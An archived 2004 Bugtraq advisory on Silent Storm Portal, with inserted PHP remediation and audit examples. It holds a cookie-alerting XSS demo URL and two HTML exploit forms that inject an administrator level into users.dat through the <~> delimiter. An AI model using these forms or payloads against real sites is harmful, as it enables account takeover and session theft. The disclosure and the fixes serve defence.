
List:       bugtraq
Subject:    Multiple Vulnerabilities in Silent Storm Portal
From:       R00tCr4ck <root () cyberspy ! org>
Date:       2004-09-30 11:57:54
Message-ID: 20040930115754.15459.qmail () www ! securityfocus ! com

#####################################
# CHT Security Research-2004        #
# http://www.CyberSpy.Org           #
# Turkey                            #
#####################################

Software:
Silent Storm Portal

Web Site:
http://www.silent-storm.co.uk/ssp/

Affected Version(s):
2.1,2.2

Description:
Silent Storm Portal is a PHP-based portal system. It requires PHP 4 or above; no MySQL is needed.

Multiple Vulnerabilities in Silent Storm Portal:

Cross-Site Scripting vulnerability : 

Silent Storm Portal is prone to cross-site scripting attacks. It is possible to construct a link containing arbitrary script code to a website running Silent Storm Portal. When a user browses the link, the script code is executed in the user's browser in the context of the site using the Portal. The impact of this issue is that the attacker is able to hijack a legitimate web user's session by stealing cookie-based authentication credentials.

Demonstration:

http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
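As an added illustration of the fix, not code from Silent Storm Portal: the reflected `module` value should never reach the page unencoded, and in practice a portal only has a handful of module names, so checking the parameter against an allow-list and HTML-encoding it in any error message removes the injection point. The module names in `ALLOWED_MODULES` are an assumption for this example; the payload is the one from the demonstration URL above, after URL decoding.

```php
<?php
// Added example (not Silent Storm Portal code): safe handling of the "module"
// request parameter. ALLOWED_MODULES is an assumed list for illustration.

const ALLOWED_MODULES = ['Home', 'profile', 'apanel'];

/** Return the module name only if it is on the allow-list, otherwise null. */
function resolveModule(string $requested): ?string
{
    // Strict comparison: no type juggling, and "../../profile" is not "profile".
    return in_array($requested, ALLOWED_MODULES, true) ? $requested : null;
}

/** Error text for an unknown module, with the echoed value HTML-encoded. */
function renderUnknownModule(string $requested): string
{
    $safe = htmlspecialchars($requested, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Unknown module: {$safe}</p>";
}

// Constructed input: the advisory's demonstration payload as PHP sees it in $_GET['module'].
$payload = '<script language=javascript>window.alert(document.cookie);</script>';

if (resolveModule($payload) === null) {
    // The angle brackets come out as &lt; and &gt;, so the browser shows text, not a script.
    echo renderUnknownModule($payload), PHP_EOL;
}
```

The allow-list also rejects values such as `../../profile` used by the forms later in this advisory, since only exact module names are accepted; the encoding step is what neutralises the script in the demonstration URL.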



Unauthorized Administrative Access Vulnerability :

Silent Storm Portal stores all account information, usernames and passwords, in the users.dat file. This file is a plaintext file stored in the db directory. There is a flaw in the profile.php file which could allow normal members to gain escalated privileges. The issue occurs due to insufficient sanitization of user-supplied data, which may allow escape character sequences to be injected into the users.dat file. Submitting an e-mail address with an evil level code via the profile module will inject an Administrator level value into the database file and escalate the current level to Administrator privileges.

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected the Administrator level "1" into the database file.
(1 = Administrator, 2 = Normal User.)

Examples from the database file:

before exploiting:

evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>
(4th field "2" = Level: Normal User)

after exploiting:

evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
(4th field "1" = Injected Level: Administrator)

You'll get the "Updated Your Profile Sucessfuly !" message after submitting exploit.html. That's all! Log out and log back in with your username/password, then click the "Admin Panel" link (index.php?module=../../apanel).
Now you have full Administrator privileges.

Here is another form that creates an Administrator account directly on the victim's portal:

---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type="hidden" name="ema" value="any@mail.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---
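Added example, not Silent Storm Portal code, covering both the profile-update and the registration variants above: the root cause is that a user-controlled field is written into a `<~>`-delimited record without checking for the delimiter, so the parser later reads the attacker's "1" as the level field. The record layout (username, password, e-mail, level, followed by spare fields) is taken from the users.dat lines quoted above; how profile.php actually assembles the line is not shown in the advisory, so `writeRecordUnsafe()` is an assumed reconstruction of that kind of concatenation. The hardened writer rejects e-mail values containing the delimiter and takes the level from the stored account rather than the request, and `auditUsersDat()` is a defender's check for records that no longer match the expected shape.

```php
<?php
// Added example (not Silent Storm Portal code). Field layout inferred from the
// advisory's users.dat excerpts; the unsafe writer is an assumed reconstruction.

const DELIM       = '<~>';
const LEVEL_ADMIN = '1';
const LEVEL_USER  = '2';
// The clean "before" record in the advisory splits into 9 fields on "<~>".
const EXPECTED_FIELDS = 9;

/** Assumed naive writer: concatenates request values straight into the record. */
function writeRecordUnsafe(string $user, string $pass, string $mail, string $level): string
{
    return implode(DELIM, [$user, $pass, $mail, $level, '', '', '', '', '']);
}

/** Split one users.dat line; the 4th field is the level the portal trusts. */
function parseRecord(string $line): array
{
    $f = explode(DELIM, $line);
    return [
        'user'   => $f[0] ?? '',
        'pass'   => $f[1] ?? '',
        'mail'   => $f[2] ?? '',
        'level'  => $f[3] ?? '',
        'fields' => count($f),
    ];
}

/** Accept only a plain e-mail address: no delimiter, no line breaks, no angle brackets. */
function validateMail(string $mail): bool
{
    if (strpos($mail, DELIM) !== false || preg_match('/[\r\n<>]/', $mail)) {
        return false;
    }
    return filter_var($mail, FILTER_VALIDATE_EMAIL) !== false;
}

/** Hardened writer: validated e-mail, and the level comes from the stored account. */
function writeRecordSafe(string $user, string $pass, string $mail, string $storedLevel): ?string
{
    if (!validateMail($mail)) {
        return null;   // refuse the update instead of writing a malformed record
    }
    return implode(DELIM, [$user, $pass, $mail, $storedLevel, '', '', '', '', '']);
}

/** Audit helper: report lines whose shape or level value is not what the format allows. */
function auditUsersDat(string $contents): array
{
    $flagged = [];
    foreach (explode("\n", rtrim($contents, "\n")) as $n => $line) {
        $r = parseRecord($line);
        $reasons = [];
        if ($r['fields'] !== EXPECTED_FIELDS) {
            $reasons[] = "field count {$r['fields']}";
        }
        if (!in_array($r['level'], [LEVEL_ADMIN, LEVEL_USER], true)) {
            $reasons[] = "level '{$r['level']}'";
        }
        if (!validateMail($r['mail'])) {
            $reasons[] = 'malformed e-mail';
        }
        if ($reasons) {
            $flagged[$n + 1] = implode(', ', $reasons);
        }
    }
    return $flagged;
}

// Constructed demonstration mirroring the advisory's forms.
$evilMail = 'any@mail.com' . DELIM . LEVEL_ADMIN;

$injected = writeRecordUnsafe('evilaccount', 'password', $evilMail, LEVEL_USER);
echo 'unsafe writer, level read back: ', parseRecord($injected)['level'], PHP_EOL;   // 1

$safe = writeRecordSafe('evilaccount', 'password', $evilMail, LEVEL_USER);
echo 'safe writer result: ', var_export($safe, true), PHP_EOL;                        // NULL

// Constructed users.dat: the advisory's "before" and "after" lines.
$usersDat = "evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>\n"
          . "evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>\n";
print_r(auditUsersDat($usersDat));   // only line 2 is flagged
```

Run it with `php` from the command line. The unsafe path shows the injected "1" landing in the level slot exactly as in the "after exploiting" record; the safe path returns null because `validateMail()` rejects the delimiter (and `FILTER_VALIDATE_EMAIL` would reject it anyway). The audit flags the tampered line by its field count, which is a cheap check an administrator can run over an existing users.dat to find accounts modified this way.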

----------------------------
The original article can be found at: 
http://www.CyberSpy.Org
(Turkish Language)

